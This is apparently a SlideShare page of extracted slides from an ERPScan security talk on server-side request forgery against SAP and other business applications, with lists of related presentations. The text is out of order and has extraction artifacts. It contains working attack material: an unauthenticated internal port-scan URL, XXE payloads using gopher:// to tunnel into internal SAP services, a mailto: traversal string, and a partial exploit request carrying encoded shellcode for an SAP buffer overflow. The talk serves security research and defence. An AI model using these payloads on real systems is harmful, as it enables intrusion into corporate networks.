Counter-­‐a^ack  on  JAR  parser            XML  engines  support  jar:  scheme.  Calling  some  URL  using  this   scheme,  JAR  parser  opens  a  remote  archive  and  takes  a  file  from   it.  If  there  is  a  file  parsing  vulnerability  in  JAR  parser,  it  will  be   possible  to  a8ack  the  server.     •  Directory  traversal       –  Tested:  JDK  jar  parser  –  not  vulnerable   •  Jar  bombs         81   Working  on  real  examples  
Counter-­‐a^ack  on  mailto:  parser                 •  mailto:%00%00.......................... ..//..//..//..//..//../../../../../../windows/system32/aaaa.exe   •  Successfully  read  the  file     •  There  should  be  an  RCE  but….         82   Found  yesterday    :)  
83  
Conclusion?   84   “Let’s  put  it  under  a  firewall”   is  not  a  solu8on  anymore  
XXE  Scanner   85  
Conclusion  2   •  SSRF  aLacks  are  very  dangerous   •  They  have  a  very  wide  range,  which  is  s8ll  poorly  covered   •  Gopher  example  is  not  the  only  one,  I  suppose   •  It  is  s8ll  a  big  research  area   •  A  lot  of  technologies  and  applica8ons  can  be  used  for  SSRF   •  I  only  check  those  places  where  I  am  working  a  lot   •  But  there  are  s8ll  many  uncovered  areas   •  OWASP-­‐EAS  SSRF  wiki   •  Let’s  make  the  biggest  database  of  SSRFs   •  Mail  me  if  you  have  any  ideas   86  
    Web:                www.erpscan.com   e-­‐mail:        info@erpscan.com                                     TwiLer:      @erpscan                  @sh2kerr     87  

More Related Content

PDF
Assessing and Securing SAP Solutions
ERPScan
 
PDF
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
ERPScan
 
PDF
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
ERPScan
 
PDF
Securing SAP in 5 steps
ERPScan
 
PDF
Attacking SAP Mobile
ERPScan
 
PDF
SAP SDM Hacking
ERPScan
 
PDF
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 
PDF
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 
Assessing and Securing SAP Solutions
ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
ERPScan
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
ERPScan
 
Securing SAP in 5 steps
ERPScan
 
Attacking SAP Mobile
ERPScan
 
SAP SDM Hacking
ERPScan
 
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP
ERPScan
 

What's hot (20)

PDF
Assess and monitor SAP security
ERPScan
 
PDF
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
PDF
Oracle PeopleSoft applications are under attacks (Hack in Paris)
ERPScan
 
PDF
EAS-SEC: Framework for securing business applications
ERPScan
 
PDF
SAP security made easy
ERPScan
 
PDF
Forgotten world - Corporate Business Application Systems
ERPScan
 
PDF
Practical SAP pentesting workshop (NullCon Goa)
ERPScan
 
PDF
SAP (in)security: New and best
ERPScan
 
PDF
All your SAP passwords belong to us
ERPScan
 
PDF
Practical SAP pentesting (B-Sides San Paulo)
ERPScan
 
PDF
SAP portal: breaking and forensicating
ERPScan
 
PDF
Attacking SAP users with sapsploit
ERPScan
 
PPT
Sap security – thinking with a hacker’s hat
n|u - The Open Security Community
 
PDF
EAS-SEC Project
ERPScan
 
PDF
5 real ways to destroy business by breaking SAP applications
ERPScan
 
PDF
Penetration Testing SAP Systems
Onapsis Inc.
 
PDF
The latest changes to SAP cybersecurity landscape
ERPScan
 
PDF
Top 10 most interesting vulnerabilities and attacks in SAP
ERPScan
 
PDF
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
PROIDEA
 
PDF
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
Virtual Forge
 
Assess and monitor SAP security
ERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
ERPScan
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
ERPScan
 
EAS-SEC: Framework for securing business applications
ERPScan
 
SAP security made easy
ERPScan
 
Forgotten world - Corporate Business Application Systems
ERPScan
 
Practical SAP pentesting workshop (NullCon Goa)
ERPScan
 
SAP (in)security: New and best
ERPScan
 
All your SAP passwords belong to us
ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
ERPScan
 
SAP portal: breaking and forensicating
ERPScan
 
Attacking SAP users with sapsploit
ERPScan
 
Sap security – thinking with a hacker’s hat
n|u - The Open Security Community
 
EAS-SEC Project
ERPScan
 
5 real ways to destroy business by breaking SAP applications
ERPScan
 
Penetration Testing SAP Systems
Onapsis Inc.
 
The latest changes to SAP cybersecurity landscape
ERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
ERPScan
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
PROIDEA
 
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
Virtual Forge
 
Ad

Similar to SSRF vs. Business-critical applications. Part 2. New vectors and connect-back attacks (20)

PDF
SSRF vs. Business-critical applications. XXE tunneling in SAP
ERPScan
 
PDF
SAP security in figures
ERPScan
 
PDF
Polyakov how i will break your enterprise. esb security and more
DefconRussia
 
PPTX
Deep dive into ssrf
n|u - The Open Security Community
 
PPTX
SSRF exploit the trust relationship
n|u - The Open Security Community
 
PDF
Practical pentesting of ERPs and business applications
ERPScan
 
PPTX
ISACA 2016 Annual Conference SA_State of Risk_Tunde Ogunkoya_DeltaGRiC_Consul...
Tunde Ogunkoya
 
PPTX
SAP (In)Security: New and Best
Positive Hack Days
 
PDF
Attacks on SAP Mobile
Positive Hack Days
 
PPTX
Ssl Vpn presentation at CoolTech club
iplotnikov
 
DOCX
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
Ajith Kp
 
PPTX
Ssrf
Ilan Mindel
 
PDF
Architecture vulnerabilities in SAP platforms
ERPScan
 
PDF
Webinar | Cybersecurity vulnerabilities of your business - Berezha Security G...
Go Global
 
PDF
Implementing SAP security in 5 steps
ERPScan
 
PDF
A crushing blow at the heart of SAP’s J2EE Engine.
ERPScan
 
PPTX
IBM Smarter Business 2012 - IBM Security: Threat landscape
IBM Sverige
 
PDF
What CISOs should know about SAP security
ERPScan
 
PPTX
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
PDF
Asec r01-resting-on-your-laurels-will-get-you-pwned
Dinis Cruz
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
ERPScan
 
SAP security in figures
ERPScan
 
Polyakov how i will break your enterprise. esb security and more
DefconRussia
 
Deep dive into ssrf
n|u - The Open Security Community
 
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Practical pentesting of ERPs and business applications
ERPScan
 
ISACA 2016 Annual Conference SA_State of Risk_Tunde Ogunkoya_DeltaGRiC_Consul...
Tunde Ogunkoya
 
SAP (In)Security: New and Best
Positive Hack Days
 
Attacks on SAP Mobile
Positive Hack Days
 
Ssl Vpn presentation at CoolTech club
iplotnikov
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
Ajith Kp
 
Ssrf
Ilan Mindel
 
Architecture vulnerabilities in SAP platforms
ERPScan
 
Webinar | Cybersecurity vulnerabilities of your business - Berezha Security G...
Go Global
 
Implementing SAP security in 5 steps
ERPScan
 
A crushing blow at the heart of SAP’s J2EE Engine.
ERPScan
 
IBM Smarter Business 2012 - IBM Security: Threat landscape
IBM Sverige
 
What CISOs should know about SAP security
ERPScan
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
Asec r01-resting-on-your-laurels-will-get-you-pwned
Dinis Cruz
 
Ad

More from ERPScan (7)

PDF
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
ERPScan
 
PDF
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
PDF
13 real ways to destroy business by breaking company’s SAP applications
ERPScan
 
PDF
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
ERPScan
 
PDF
With big data comes big responsibility
ERPScan
 
PDF
Breaking SAP portal (DeepSec)
ERPScan
 
PDF
Breaking SAP portal (HashDays)
ERPScan
 
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
13 real ways to destroy business by breaking company’s SAP applications
ERPScan
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
ERPScan
 
With big data comes big responsibility
ERPScan
 
Breaking SAP portal (DeepSec)
ERPScan
 
Breaking SAP portal (HashDays)
ERPScan
 

Recently uploaded (20)

PDF
medical staffing services at VALiNTRY
Tiyan Grayson
 
PPTX
Agentic AI Use Case- Contract Lifecycle Management (CLM).pptx
mhxyzzp
 
PDF
Digital Strategies for Manufacturing Companies
Virendra Rai, PMP
 
PDF
Raksha Bandhan Grocery Pricing Trends in India 2025.pdf
Actowiz Solustions
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
PPTX
Transform Your Business with a Software ERP System
Canada Software Company
 
PDF
Adobe Premiere Pro 2025 (v24.5.0.057) Crack free
ghrom2211g
 
PPTX
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
PDF
Design an Analysis of Algorithms I-SECS-1021-03
DilanEscobar1
 
PDF
Understanding Forklifts - TECH EHS Solution
TECH EHS Solution
 
PDF
Flood Susceptibility Mapping Using Image-Based 2D-CNN Deep Learnin. Overview ...
lawrenceomai2
 
PPTX
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
hci7se
 
PDF
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
TechBuilder
 
PDF
wealthsignaloriginal-com-DS-text-... (1).pdf
skmiani786
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
itskinga12
 
PPTX
ai tools demonstartion for schools and inter college
harshavardhanreddyka11
 
PDF
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
PDF
Odoo Companies in India – Driving Business Transformation.pdf
azhuhardeen1968
 
PDF
Softaken Excel to vCard Converter Software.pdf
markwillsonmw004
 
PDF
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
deepakkhaitan3
 
medical staffing services at VALiNTRY
Tiyan Grayson
 
Agentic AI Use Case- Contract Lifecycle Management (CLM).pptx
mhxyzzp
 
Digital Strategies for Manufacturing Companies
Virendra Rai, PMP
 
Raksha Bandhan Grocery Pricing Trends in India 2025.pdf
Actowiz Solustions
 
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
Transform Your Business with a Software ERP System
Canada Software Company
 
Adobe Premiere Pro 2025 (v24.5.0.057) Crack free
ghrom2211g
 
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
Design an Analysis of Algorithms I-SECS-1021-03
DilanEscobar1
 
Understanding Forklifts - TECH EHS Solution
TECH EHS Solution
 
Flood Susceptibility Mapping Using Image-Based 2D-CNN Deep Learnin. Overview ...
lawrenceomai2
 
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
hci7se
 
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
TechBuilder
 
wealthsignaloriginal-com-DS-text-... (1).pdf
skmiani786
 
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
itskinga12
 
ai tools demonstartion for schools and inter college
harshavardhanreddyka11
 
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
Odoo Companies in India – Driving Business Transformation.pdf
azhuhardeen1968
 
Softaken Excel to vCard Converter Software.pdf
markwillsonmw004
 
EN-Survey-Report-SAP-LeanIX-EA-Insights-2025.pdf
deepakkhaitan3
 

SSRF vs. Business-critical applications. Part 2. New vectors and connect-back attacks

  • 1. Invest  in  security   to  secure  investments   SSRF  VS.  BUSINESS-­‐CRITICAL   APPLICATIONS   PART  2:  NEW  VECTORS  AND  CONNECT-­‐ BACK  ATTACKS     Alexander  Polyakov  –  CTO  at  ERPScan    
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu8on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presentaQons  key  security  conferences  worldwide   •  25  Awards  and  nominaQons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 3. Agenda   •  Enterprise  applica8ons   •  SSRF     –  History   –  Types   •  SSRF  Proxy  aLacks   –  Example  of  ALacking  SAP  with  SSRF   •  SSRF  Connect-­‐back  aLacks   –  Examples   •  XXE  Scanner   •  Conclusion   3  
  • 4. Enterprise  applicaQons:  DefiniQons    Business  so)ware  is  generally  any  so)ware  that  helps  business  to   increase  its  efficiency  or  measure  its  performance     •  Small  (MS  Office)   •  Medium  (CRM,  Shops)   •  Enterprise  (ERP,  BW…)   4  
  • 5. Why  are  they  criQcal?   •   Any  informa7on  an  a8acker  might  want,  be  it  a  cybercriminal,   industrial  spy  or  compe7tor,  is  stored  in  corporate  ERP.  This   informa7on  can  include  financial,  customer  or  public  rela7ons,   intellectual  property,  personally  iden7fiable  informa7on  and   more.  Industrial  espionage,  sabotage,  and  fraud  or  insider   embezzlement  may  be  very  effec7ve  if  targeted  at  the  vic7m’s   ERP  system,  and  they  can  cause  significant  damage  to  the   business.   5  
  • 6. Business-­‐criQcal  systems  architecture   •  Located  in  a  secure  subnetwork       •  Secured  by  firewalls     •  Monitored  by  IDS  systems   •  Regularly  patched     6  
  • 8. But  let’s  assume  that  they  are,   because  it  will  be  much  more   interes8ng  to  aLack  them   8  
  • 9. Secure  corporate  network     The     Internet     9   Industrial   network   ERP     network   Corporate   network  
  • 10. But  wait.   There  must  be  some  links!   10  
  • 11. Real  corporate  network   The   Internet     11   Industrial   network   ERP     network   Corporate   network  
  • 12. And…   ALackers  can  use  them!   12  
  • 13. Corporate  network  a^ack  scenario   The   Internet     13   Industrial   network   ERP     network   Corporate   network  
  • 16. Supa  Sexy  Robo  Fashion   16  
  • 17. SSRF  History:  the  beginning   •  SSRF:  Server  Side  Request  Forgery.     •  An  aLack  which  was  discussed  in  2008  with  very  liLle   informa8on  about  theory  and  prac8cal  examples.     •  Like  any  new  term,  SSRF  doesn’t  show  us  something  completely   new  like  a  new  type  of  vulnerability.  SSRF-­‐style  aLacks  were   known  before.       17  
  • 18. SSRF  History:  Basics   •  We  send  Packet  A  to  Service  A   •  Service  A  ini8ates  Packet  B  to  service  B   •  Services  can  be  on  the  same  host  or  on  different  hosts   •  We  can  manipulate  some  fields  of  packet  B  within  packet  A   •  Various  SSRF  aLacks  depend  on  how  many  fields  we  can   control  in  packet  B     18   Packet  A   Packet  B  
  • 19. SSRF    history   •  DeralHeiland  –  Shmoocon  2008   –  Web  Portals  Gateway  To  Informa8on  Or  A  Hole  In  Our  Perimeter  Defenses   •  Spiderlabs  2012   –  hLp://blog.spiderlabs.com/2012/05/too-­‐xxe-­‐for-­‐my-­‐shirt.html   •  Vorontsov  2012   –   SSRF  via  XXE   hLp://2012.caro.org/presenta8ons/aLacks-­‐on-­‐large-­‐modern-­‐web-­‐ applica8ons   •  ERPScan  (Polyakov,Chastuchin)  -­‐  SSRF  vs  business  cri8cal   applica8ons  (Gopher  protocol)  2012  august   –  hLp://erpscan.com/wp-­‐content/uploads/2012/08/SSRF-­‐vs-­‐business-­‐ cri8cal-­‐applica8ons.-­‐XXE-­‐Tunelling-­‐in-­‐SAP.pdf   19  
  • 20. SSRF    history   •  ssrfsocks  by  iamultra:  a  tool  for  ERPScan’s  vulnerability  in  Gopher   –  hLps://github.com/iamultra/ssrfsocks    2012  august     •  Less  Known  Web  App  Vulnerabili8es:  Real  World  Examples.  (From   ERPScan  paper)  2012  October   •  ERPScan  -­‐  Gopher  SSRF  in  JVM  advisory    October  2012   –  hLp://erpscan.com/advisories/dsecrg-­‐12-­‐039-­‐oracle-­‐jvm-­‐gopher-­‐protocol-­‐ ssrf/   •  ERPScan  (Polyakov)  -­‐  SSRF  2.0   –   hLp://erpscan.com/category/publica8ons/   •  New  research  will  be  published  at  ZeroNights   hLp://2012.zeronights.org/   20  
  • 21. Ideal  SSRF            The  idea  is  to  find  vic7m  server  interfaces  that  will  allow  sending   packets  ini7ated  by  the  vic7m  server  to  the  localhost  interface   of  the  vic7m  server  or  to  another  server  secured  by  a  firewall   from  outside.  Ideally,  this  interface  :     •  Must  allow  sending  any  packet  to  any  host  and  any  port   •  Must  be  accessed  remotely  without  authenQcaQon       21  
  • 22. Why?   In  this  research,  we  wanted  to  :     •  Collect  the  informa8on  about  SSRF  aLacks   •  Categorize  them   •  Show  examples  of  SSRF  aLacks   •  Show  new  poten8al  and  real  SSRF  vectors       22  
  • 23. SSRF   Trusted  SSRF   Remote   SSRF   SSRF  proxy  aLack   SSRF  back  connect   SSRF  counter   aLack   Local  SSRF   Simple   Par8al   Full   23  
  • 24. SSRF  proxy  a^ack   24   Secure     network   Corporate   network   Packet  B  Packet  B   Packet  A  
  • 25. SSRF  back  connect  a^ack   25   Packet  B   Packet  C   Packet  B   Packet  A  
  • 26. SSRF  proxy  a^acks   •  Trusted  SSRF  (Can  forge  requests  to  remote  services  but  only  to   predefined  ones)   •  Remote  SSRF  (Can  forge  requests  to  any  remote  IP  and  port)   –  Simple  Remote  SSRF  (No  control  on  app  level)   –  ParQal    Remote  SSRF  (Control  in  some  fields  of  app  level)   –  Full  Remote  SSRF  (Control  on  app  level)   26  
  • 27. ExploiQng  SSRF            For  every  SSRF  a8ack,  there  must  be  at  least  2  vulnerabili7es  to   successfully  trigger  the  a8ack:   •  First  vulnerability   –  Func8onality  to  create/use  links  (for  trusted  SSRF)   –  Func8onality  in  some  service  on  Server  A  which  allows  us  to  send  remote   packets  (for  other  types  of  SSRF)   •  Second  vulnerability     –  Insecure  link  (for  trusted  SSRF)   –  Vuln.  in  service  on  server  B  (for  remote  SSRF  )   –  Vuln.  in  localhost  service  on  server  A  (for  local  SSRF)   –  Vuln.  in  client  app.  on  server  A  (for  back-­‐connect  SSRF)   27  
  • 28. Trusted  SSRF   •  Trusted  SSRF  in  Oracle   –  SELECT  *  FROM  myTable@HostB   –  EXECUTE  Schema.Package.Procedure('Parameter')@HostB   •  Trusted  SSRF  in  MSSQL       –  Select  *  from  openquery(HostB,'select  *  from  @@version')]   •  Trusted  SSRF  in  SAP  NetWeaver     –  SM59  transac8on   •  Also  Lotus  Domino  and  others         28   Not  so  interes8ng…  
  • 29. First  vulnerability  (funcQonality  on  Server  A)   •  Unusual  calls   •  Mul8protocol  calls  (URI)   –  In  engines  (XML)   –  In  applica8ons     •  UNC  calls   •  HTTP  calls   •  FTP  calls   •  LDAP  calls   •  SSH  calls   •  Other  calls     29  
  • 30. FuncQonality  on  server  A:  Unusual  calls   •  Remote  port  scan   –  SAP  NetWeaver  wsnavigator  (sapnote  1394544,871394)   –  SAP  NetWeaver  ipcpricing  (sapnote  1545883)   –  SAP  BusinessObjects  viewrpt  (sapnote  1583610)   •  Remote  password    bruteforce   –  SAP  NetWeaver  (NDA)   •  Other   –  Informa8on  disclosure  by  tes8ng  if  a  file  or  a  directory  exists   –  Timing  aLacks   –  Etc????   30   Very  applica8on-­‐specific.  Can  be  very  interes8ng  
  • 31. Example  of  unusual  calls   31   •   It  is  possible  to  scan  internal  network  from  the  Internet   •   Authen8ca8on  is  not  required   •   SAP  NetWeaver  J2EE  engine  is  vulnerable         /ipcpricing/ui/BufferOverview.jsp?   server=172.16.0.13     &  port=31337     &  dispatcher=     &  targetClient=     &  view=    
  • 32. Port  scan  via  ipcpricing  JSP     32   Port  closed   HTTP  port   SAP  port  
  • 33. MulQprotocol  calls  (in  XML)   •  XML  seems  to  be  the  new  TCP.   •  Almost  all  big  projects  use  XML-­‐based  data  transfer.   •  There  are  a  lot  of  XML-­‐based  protocols  with  different  op8ons  to   call  external  resources  and  thus  conduct  SSRF  aLacks.     •  There   is   at   least   one   element   type   which   fits   almost   all   XML-­‐ based  schemes.  The  type  is:  xsd:anyURI.     •  URIs  also  encompass  URLs  of  other  schemes  (e.g.,  FTP,  gopher,   telnet),  as  well  as  URNs.   •  Popular  URIs:  hLp://  vp://  telnet://  …..   33  
  • 34. MulQprotocol  calls  in  XML   •  XML   –  XML  External  En8ty   –  XSD  defini8on   •  XML  Encryp8on   •  XML  Signature   •  WS-­‐Policy   •  From  WS-­‐Security   •  WS-­‐Addressing   34  
  • 35. MulQprotocol  calls  in  XML   •  XBRL   •  ODATA  (edmx)   –  ODATA  External  En8ty   –  Other   •  BPEL   •  STRATML   35  
  • 36. XML  EncrypQon     1.  <xenc:AgreementMethod  Algorithm=  "hLp://ServerB/">   2.  <xenc:Encryp8onProperty  Target=  "hLp://ServerB/">   3.  <xenc:CipherReference  URI=  "hLp://ServerB/">   4.  <xenc:DataReference  URI=  "hLp://ServerB/">   36   Successfully  Tested    
  • 37. XML  Signature     1.  <Reference  URI=”hLp://ServerB/aLack”>     37   Successfully  Tested    
  • 38. WS-­‐Addressing   1.  <To  xmlns="hLp://www.w3.org/2005/08/addressing">    h^p://ServerB/                </To>     2.  <ReplyTo  xmlns="hLp://www.w3.org/2005/08/addressing">   <Address>h^p://ServerB/</Address>                </ReplyTo>     38   Successfully  Tested  (0-­‐day)    
  • 39. WS-­‐Policy     1.  <wsp:PolicyReference  URI="hLp://ServerB/">       39   Not  Tested  
  • 40. WS-­‐Security   1.  <input  message=“blabla“      wsa:AcQon="hLp://ServerB”/>   2.   <output  message=“blabla  “  wsa:AcQon="hLp://ServerB"/>       40   Not  Tested    
  • 41. WS-­‐FederaQon   1.  <fed:Federa8on  Federa8onID="hLp://ServerB/">     2.  <fed:Federa8onInclude>hLp://ServerB/</fed:Federa8onInclude>   3.  <fed:TokenIssuerName>hLp://ServerB/</fed:TokenIssuerName>   4.  <mex:MetadataReference>                          <wsa:Address>hLp://ServerB/</wsa:Address>                  </mex:MetadataReference>     41   Not  Tested    
  • 42. XBRL   1.  <xbrli:iden8fier  scheme="hLp://ServerB/">   2.  <link:roleType  roleURI="hLp://ServerB/">       42   Not  Tested    
  • 43. ODATA  (edmx)                The  edmx:Reference  element  specifies  external  en7ty  models   referenced  by  this  EDMX.  Referenced  models  are  available  in   their  en7rety  to  referencing  models.  All  en7ty  types,  complex   types  and  other  named  elements  in  a  referenced  model  can  be   accessed  from  a  referencing  model.       hLp://www.odata.org/media/30002/OData%20CSDL%20Defini8on.html   43   No  examples  of  edmx  in  the  wild  (new  protocol)  
  • 44. ODATA     1.  <edmx:Reference  URI=”hLp://ServerB/aLack”>   2.  <edmx:Annota8onsReference  URI=”hLp://ServerB/aLack”>       44   S8ll  no  products  for  tes8ng  (0-­‐day)  
  • 45. STRATML     1.  <stratml:Source>h^p://ServerB/</stratml:Source>       45   Not  tested  
  • 46. SOAP         SoapAc8on?       46   No  Examples  
  • 47. Mul8protocol  Calls  in   Applica8ons   47  
  • 48. MulQprotocol  calls     Not  so  usual  but  a  poten7ally  big  area   •  Oracle  Database     –  UTL_TCP   48  
  • 49. UNC  calls:  threats   •  Sure  you  can  call  UNC  path  if  you  have  a  universal  URI   •  But  if  there  is  no  universal  engine  you  can  search  for  UNC   •  UNC  calls  can  be  used  for:   –  conduc8ng  SMBRelay  aLack   –  reading  files  from  shared  folders  (open  or  trusted)   –  other  vectors  which  will  be  discussed  later.   49   Check  SMBRelay  bible  posts  from   hLp://erpscan.com/?s=SMBRelay+Bible&x=0&y=0  
  • 50. UNC  calls:  applicaQons   •  SAP  NetWeaver   –  From  SAP  webservices  (sapnote  1503579,1498575)   –  From  RFC  func8ons  (sapnote  1554030)   –  From  SAP  transac8ons,  reports  (sapnote  1583286)   •  Oracle  Database   –  Listener   –  Database  commands  such  as  ctxsys.context     50   And  much  more  
  • 51. UNC  calls:  applicaQons   •  MsSQL  Database   •  MySQL  Database   •  FTP  servers   •  IBM  Lotus  Domino  controller   •  VMWare   •  Anything  that  uses  XML  engine   51   And  much  more  
  • 52. HTTP  calls:  threats   •  Sure  you  can  call  HTTP  path  if  you  have  a  universal  URI   •  But  if  there  is  no  universal  engine,  you  can  search  for  HTTP   •  HTTP  calls  can  be  used  for  conduc8ng  wide  range  of  aLacks   on  systems  which  are  in  one  network  with  Server  A   -  DoS   -  Inf  disclosure   -  Unauthorized  access  (like  invoker  servlets)   -  Bruteforcing  (users/directories/pages)   -  Fingerprin8ng   -  etc       52   Examples  of  HTTP  aLacks  are  beyond  the  current  research  
  • 53. HTTP  calls:  applicaQons   •  SAP  NetWeaver   –  Transac8ons   –  Reports   –  RFC  commands   –  Portal  portlets   –  Portal  links   •  Oracle  Database   –  UTL_HTTP   •  MsSQL  Database   •  PostgreSQL  Database   •  Anything  that  uses  XML  engine   53   And  much  more  
  • 54. FTP  calls  threats   •  Sure  you  can  call  FTP  path  if  you  have  a  universal  URI   •  FTP  is  usually  possible  whenever  HTTP  is  possible   •  But  if  there  is  no  universal  engine,  you  can  search  for  FTP   •  FTP  calls  can  be  used  to  conduct  wide  range  of  aLacks  on   systems  which  are  in  one  network  with  Server  A   -  DoS   -  Inf  disclosure   -  Unauthorized  access  (like  invoker  servlets)   -  Bruteforcing  (users/directories/pages)   -  Fingerprin8ng   -  etc.       54   Examples  of  FTP  aLacks  are  beyond  the  current  research  
  • 55. FTP  calls:  applicaQons   •  SAP  NetWeaver   –  Transac8ons   –  Reports   –  RFC  commands   •  Oracle  Database   –  UTL_HTTP   •  PostgreSQL  Database   •  Anything  that  uses  XML  engine   55   And  much  more  
  • 56. Other  calls   •  ldap://   –  Bruteforce  logins   –  Informa8on  disclosure   •  jar://     –  Informa8on  disclosure   •  mailto:   •  ssh2://   –  Bruteforce  logins   –  Rce?   •  gopher://     –  XXE  Tunneling   •  …….   56   Just  the  most  popular  ones  
  • 57. ExploiQng  Gopher  (Example)   <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher://172.16.0.1:3300/AAAAAAAAA"  >]>    <foo>&date;</foo>     57   What  will  happen??  
  • 58. XXE  Tunneling  (Example)   58   Server  B  (ERP,   HR,  BW  etc.)   Server  A  (Portal  or  XI)     192.168.0.1   172.16.0.1   POST  /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.DilbertMSG? format=post  HTTP/1.1   Host:  192.168.0.1:8000     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher:// 172.16.0.1:3300/AAAAAAAAA"  >]>    <foo>&date;</foo>   AAAAAAAAAAAAA   Port   3300   telnet  172.16.0.1  3300  
  • 59. XXE  Tunneling  to  Buffer  Overflow  (Example)   •  A  buffer  overflow  vulnerability  found  by  Virtual  Forge  in  ABAP   Kernel  (fixed  in    sapnote  1487330)   •  Hard  to  exploit  because  it  requires  calling  an  RFC  func8on  which   calls  Kernel  func8on   •  But  even  such  a  complex  aLack  can  be  exploited   •  Get  ready  for  the  hardcore   59  
  • 60. XXE  Tunneling  to  Buffer  Overflow  (Hint  1)   •  Shellcode  size  is  limited  to  255  bytes  (name  parameter)   •  As  we  don’t  have  direct  connec8on  to  the  Internet  from  the   vulnerable  system,  we  want  to  use  DNS  tunneling  shellcode  to   connect  back   •  But  the  XML  engine  saves  some  XML  data  in  RWX  memory   •  So  we  can  use  egghunter   •  Any  shellcode  can  be  uploaded     60  
  • 61. XXE  Tunneling  to  Buffer  Overflow:  Packet  B       POST  /sap/bc/soap/rfc?sap-­‐client=000  HTTP/1.1   Authoriza8on:  Basic  U1FQKjowMjA3NTk3==   Host:  company.com:80   User-­‐Agent:  ERPSCAN  Pentes8ng  tool  v  0.2   Content-­‐Type:  text/xml;  charset=u•-­‐8   Cookie:  sap-­‐client=000   Content-­‐Length:  2271       <SOAP-­‐ENV:Envelope  xmlns:SOAP-­‐ENV="hLp://schemas.xmlsoap.org/soap/envelope/"  xmlns:SOAP-­‐ENC="hLp://schemas.xmlsoap.org/soap/ encoding/"  xmlns:xsi="hLp://www.w3.org/2001/XMLSchema-­‐instance"  xmlns:xsd="hLp://www.w3.org/2001/XMLSchema"><SOAP-­‐ ENV:Body><m:RSPO_R_SAPGPARAM  xmlns:m="urn:sap-­‐ com:document:sap:rfc:func8ons"><HEAP_EGG>dsecdsechff‚4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4 M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O 0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c0 53q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3 Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91T GFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0 Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494 